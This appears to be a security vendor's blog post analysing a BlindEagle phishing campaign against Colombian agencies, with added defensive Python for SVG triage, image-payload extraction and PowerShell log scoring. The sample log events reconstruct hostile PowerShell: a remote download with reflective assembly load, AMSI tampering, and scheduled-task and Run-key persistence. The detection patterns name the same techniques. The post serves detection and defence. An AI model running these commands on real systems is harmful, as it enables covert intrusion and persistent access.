BlindEagle Hackers Target Government Agencies Using Sophisticated PowerShell Attacks

25-12-22, 6:48 p.m.
BlindEagle threat actors used multi-stage, file-less attacks with phishing emails, PowerShell scripts, and obfuscated malware to target government systems. The campaign highlights the growing complexity of cyberattacks and the need for proactive, layered security defenses.
A South American threat group known as BlindEagle has launched a highly sophisticated cyber campaign targeting Colombian government agencies, signaling a notable escalation in both technical capability and operational maturity. The attacks, first observed in early September 2025, demonstrate how modern threat actors are blending social engineering with advanced, file-less malware techniques to evade traditional security controls.
A Trusted Email Becomes the Entry Point
The campaign began with carefully crafted phishing emails impersonating Colombia’s judicial system. Using formal legal language and official formatting, the messages claimed to be labor lawsuit notifications, pressuring recipients to act quickly. What made the attack particularly effective was that the phishing emails were sent from compromised internal accounts within the same organization, allowing them to bypass many standard email security filters that focus on external threats.
By exploiting internal trust relationships, BlindEagle significantly increased the likelihood of user interaction while reducing early detection. Because the messages came from genuine mailboxes in the victim's own domain, they also passed sender authentication checks such as SPF, DKIM and DMARC, and any allow-listing of internal senders; those controls are designed to catch spoofing, not account takeover.
A Multi-Stage, File-Less Attack Chain
Security researchers at Zscaler identified a complex, multi-stage infection chain designed to keep the final payload off disk. The initial attachment was an SVG image containing encoded HTML which, when opened in a browser, redirected victims to a fraudulent web portal mimicking Colombia's judicial branch. SVG is a useful smuggling container because it is treated as an image by most attachment filters yet may legitimately contain script.
From there, the attack unfolded through several stages involving JavaScript files and a PowerShell command. Each stage decoded and unpacked the next, using Base64 and custom encoding routines, so that no single stage contained the full malicious logic in readable form. This layering slows manual analysis and defeats signatures written against any one stage.
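One way to triage SVG attachments for the smuggling pattern described above, as an added example (not Zscaler's or the campaign's code): parse the SVG, pull out every script element, javascript: link and event-handler attribute, look for idioms a static document image has no reason to use, and Base64-decode any long literal blob to see whether it hides an HTML document. The sample SVG, the indicator list and the blob-length threshold are constructed assumptions for this example.

```python
"""Triage an SVG attachment for smuggled HTML/JavaScript (added example)."""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XHTML_NS = "http://www.w3.org/1999/xhtml"

# Constructed sample lure, NOT the campaign's real attachment: the script
# Base64-decodes an HTML document and writes it over the rendered SVG.
SMUGGLED_HTML = (b'<html><body><script>location.href='
                 b'"https://portal.example.invalid/";</script></body></html>')
SAMPLE_SVG = f"""<svg xmlns="{SVG_NS}" width="600" height="800">
  <text x="20" y="40">Notificacion judicial - cargando...</text>
  <script type="text/javascript"><![CDATA[
    var p = "{base64.b64encode(SMUGGLED_HTML).decode()}";
    var h = atob(p);
    document.open(); document.write(h); document.close();
  ]]></script>
</svg>"""

# JavaScript idioms that a static document image has no reason to use (assumed list).
INDICATORS = ("atob(", "document.write", "location.href", "window.open",
              "fromCharCode", "eval(", "unescape(")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_scripts(svg_text: str) -> list[str]:
    """Text of every SVG/XHTML <script>, plus javascript: links and on* handlers."""
    root = ET.fromstring(svg_text)
    found = []
    for el in root.iter():
        if el.tag in (f"{{{SVG_NS}}}script", f"{{{XHTML_NS}}}script") and el.text:
            found.append(el.text)
        for attr, val in el.attrib.items():
            # <a xlink:href="javascript:..."> and onload=... also execute code
            if attr.endswith("href") and val.strip().lower().startswith("javascript:"):
                found.append(val)
            elif attr.startswith("on"):
                found.append(val)
    return found


def decode_blobs(script: str) -> list[bytes]:
    """Base64-decode every long literal blob found in a script body."""
    out = []
    for m in B64_RUN.finditer(script):
        try:
            out.append(base64.b64decode(m.group(0), validate=True))
        except binascii.Error:
            continue
    return out


def triage_svg(svg_text: str) -> dict:
    """Flag an SVG whose script uses smuggling idioms or hides a decodable HTML blob."""
    scripts = extract_scripts(svg_text)
    hits = sorted({i for s in scripts for i in INDICATORS if i in s})
    decoded = [b for s in scripts for b in decode_blobs(s)]
    html = [b for b in decoded if b"<html" in b.lower() or b"<script" in b.lower()]
    verdict = "suspicious" if scripts and (hits or html) else "clean"
    return {"scripts": len(scripts), "indicators": hits,
            "decoded_html": html, "verdict": verdict}


if __name__ == "__main__":
    print(triage_svg(SAMPLE_SVG))
```

Run over the constructed sample the verdict is "suspicious" with `atob(` and `document.write` as indicators and the decoded blob is the redirecting HTML document; an SVG with no script at all comes back "clean". A mail gateway rule that simply strips or quarantines any SVG containing a script element is the blunter but more robust version of this check.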
Steganography and Legitimate Services Used for Payload Delivery
One of the most advanced aspects of the campaign was its use of steganography and legitimate online services. The PowerShell command downloaded an image file hosted on the Internet Archive and extracted a hidden, Base64-encoded payload embedded within the image. The malicious code was then loaded directly into memory using .NET reflection, leaving no files on disk. This file-less execution method significantly reduces the effectiveness of traditional antivirus tools that rely on file scanning. It is not invisible, though: the script still runs inside powershell.exe and the assembly still passes through the .NET loader, so script block logging and AMSI can observe it, which is precisely why the later stages tamper with AMSI.
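An analyst-side extractor for the image trick described above, added here as an example and not taken from Zscaler or the malware: find where the genuine image ends (the PNG IEND chunk or the JPEG end-of-image marker), treat everything after it as an overlay, and Base64-decode whatever is delimited there. The marker strings, the carrier image and the stand-in payload are all constructed for this example; the report does not state what delimiters the real loader searched for.

```python
"""Recover a Base64 payload hidden after the real image data (added example)."""
import base64
import binascii
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Marker strings are an assumption for this example; real loaders vary.
START, END = b"<<BASE64_START>>", b"<<BASE64_END>>"
MARKED = re.compile(re.escape(START) + rb"(.*?)" + re.escape(END), re.S)
BARE_B64 = re.compile(rb"[A-Za-z0-9+/\r\n]{64,}={0,2}")


def _chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png_1x1() -> bytes:
    """A valid 1x1 RGB PNG, used as the innocent-looking carrier."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed stand-in for a .NET assembly: only the DOS header bytes matter here.
FAKE_ASSEMBLY = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n"
SAMPLE_IMAGE = make_png_1x1() + START + base64.b64encode(FAKE_ASSEMBLY) + END


def image_end_offset(data: bytes) -> int:
    """Offset just past the genuine image: after the PNG IEND chunk or the JPEG EOI."""
    if data.startswith(PNG_SIG):
        i = len(PNG_SIG)
        while i + 8 <= len(data):
            length, ctype = struct.unpack(">I4s", data[i:i + 8])
            i += 12 + length  # length + type + data + crc
            if ctype == b"IEND":
                return i
        return len(data)
    if data.startswith(b"\xff\xd8"):
        # Good enough for a plain JPEG; EXIF thumbnails carry their own EOI,
        # so a production tool should walk the segments instead.
        eoi = data.find(b"\xff\xd9")
        return eoi + 2 if eoi != -1 else len(data)
    return 0  # unknown container: treat the whole file as overlay


def extract_hidden_payloads(data: bytes) -> list[bytes]:
    """Decode marker-delimited (or, failing that, bare) Base64 found in the overlay."""
    overlay = data[image_end_offset(data):]
    cands = [m.group(1) for m in MARKED.finditer(overlay)]
    if not cands:
        cands = [m.group(0) for m in BARE_B64.finditer(overlay)]
    out = []
    for c in cands:
        try:
            out.append(base64.b64decode(b"".join(c.split()), validate=True))
        except binascii.Error:
            continue
    return out


def classify(blob: bytes) -> str:
    """Coarse type of a recovered blob; 'MZ' is how a reflectively loaded assembly starts."""
    if blob[:2] == b"MZ":
        return "pe-image"
    if blob.lstrip()[:1] == b"<":
        return "markup"
    try:
        blob.decode("ascii")
        return "text"
    except UnicodeDecodeError:
        return "binary"


if __name__ == "__main__":
    for p in extract_hidden_payloads(SAMPLE_IMAGE):
        print(classify(p), len(p), "bytes")
```

The same overlay check is a cheap hunting heuristic in its own right: an image whose file size is far larger than its parsed chunk or segment structure accounts for is worth a look, whether or not the trailer decodes cleanly.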
Advanced Malware and Persistent Access
The PowerShell script executed a downloader known as Caminho, which then retrieved DCRAT through Discord's infrastructure. DCRAT includes evasion techniques such as disabling Microsoft's Antimalware Scan Interface (AMSI), the hook through which Defender and other engines inspect script content in memory before it runs, so that later script stages are never scanned. Once deployed, the malware established persistence through scheduled tasks and registry modifications, enabling long-term access to compromised systems.
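The behaviours named in this section (remote fetch from a legitimate host, Base64 decode, reflective assembly load, AMSI tampering, scheduled-task and Run-key persistence) all leave traces in PowerShell script block logging, Event ID 4104 in the Microsoft-Windows-PowerShell/Operational channel. The scoring rules below are an added example of how a detection engineer might weight those traces; they are not Zscaler's detection logic, and the four log events are constructed and schematic rather than the campaign's real script text.

```python
"""Score PowerShell script block log events for the tradecraft above (added example)."""
import re

# Rule table: (name, pattern, weight). Patterns and weights are assumptions
# chosen for this example, not a vendor's detection content.
RULES = [
    ("reflective_load", re.compile(r"Reflection\.Assembly\]::Load", re.I), 3),
    ("base64_payload", re.compile(r"FromBase64String", re.I), 1),
    ("amsi_tamper", re.compile(r"amsiInitFailed|AmsiScanBuffer|AmsiUtils", re.I), 4),
    ("remote_fetch", re.compile(r"DownloadData|DownloadString|Invoke-WebRequest|Net\.WebClient", re.I), 1),
    ("legit_service_hosting", re.compile(r"archive\.org|discord(app)?\.com", re.I), 2),
    ("scheduled_task", re.compile(r"Register-ScheduledTask|schtasks(\.exe)?\s+/create", re.I), 2),
    ("run_key", re.compile(r"CurrentVersion\\Run", re.I), 2),
]
ALERT_THRESHOLD = 4  # one strong rule, or a combination of weaker ones

# Constructed events. "message" stands in for the ScriptBlockText field of a
# 4104 record; record 4 is a 4103 (module logging) event to show the filter.
SAMPLE_EVENTS = [
    {"record": 1, "id": 4104, "user": "CORP\\alice",
     "message": r"Get-ChildItem C:\Users -Recurse | Where-Object Length -gt 1MB"},
    {"record": 2, "id": 4104, "user": "CORP\\alice",
     "message": r"$c=New-Object Net.WebClient;$b=$c.DownloadData('https://archive.org/download/example/img.jpg');"
                r"$p=[Text.Encoding]::UTF8.GetString($b);$p=$p.Substring($p.IndexOf('<<')+2);"
                r"[Reflection.Assembly]::Load([Convert]::FromBase64String($p)).EntryPoint.Invoke($null,$null)"},
    {"record": 3, "id": 4104, "user": "CORP\\alice",
     "message": r"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed',...);"
                r"Register-ScheduledTask -TaskName 'Updater' -Action $a -Trigger $t;"
                r"Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name svc -Value $path"},
    {"record": 4, "id": 4103, "user": "CORP\\alice",
     "message": "CommandInvocation(Invoke-WebRequest): https://archive.org/"},
]


def score_script(text: str) -> tuple[int, list[str]]:
    """Sum the weights of every rule that fires on one script block."""
    fired = [name for name, pat, _ in RULES if pat.search(text)]
    score = sum(w for name, _, w in RULES if name in fired)
    return score, fired


def alerts(events: list[dict]) -> list[dict]:
    """Script block events (ID 4104) whose score reaches the threshold, in log order."""
    out = []
    for ev in events:
        if ev.get("id") != 4104:
            continue
        score, fired = score_script(ev["message"])
        if score >= ALERT_THRESHOLD:
            out.append({"record": ev["record"], "user": ev["user"],
                        "score": score, "rules": fired})
    return out


if __name__ == "__main__":
    for a in alerts(SAMPLE_EVENTS):
        print(a)
```

Two prerequisites make this useful. Script block logging has to be on (Group Policy "Turn on PowerShell Script Block Logging", i.e. EnableScriptBlockLogging=1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging), and the events have to be forwarded off the host, because a block is logged when it is compiled, before it runs, so the record of the AMSI tamper itself survives even though subsequent scanning does not.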
What This Means for Organizations
This campaign highlights a growing shift in cyber threats. Attackers are no longer relying solely on basic malware or obvious phishing attempts. Instead, they are using trusted services, in-memory execution, and internal account compromise to bypass security layers entirely. These techniques are not limited to government agencies and can be adapted easily for attacks against private organizations.
How Upside Business Technologies Can Help
Upside Business Technologies helps organizations defend against advanced threats like BlindEagle by focusing on layered, real-world security controls. We help secure email environments against internal account abuse, monitor PowerShell and script activity for suspicious behavior, and strengthen endpoint defenses against file-less malware. Our approach emphasizes proactive detection, rapid response, and practical hardening of systems that attackers commonly target.
As threat actors continue to evolve, organizations need security strategies that go beyond traditional tools. Understanding how modern attacks work is the first step. Having the right cybersecurity partner in place is what turns that understanding into real protection.
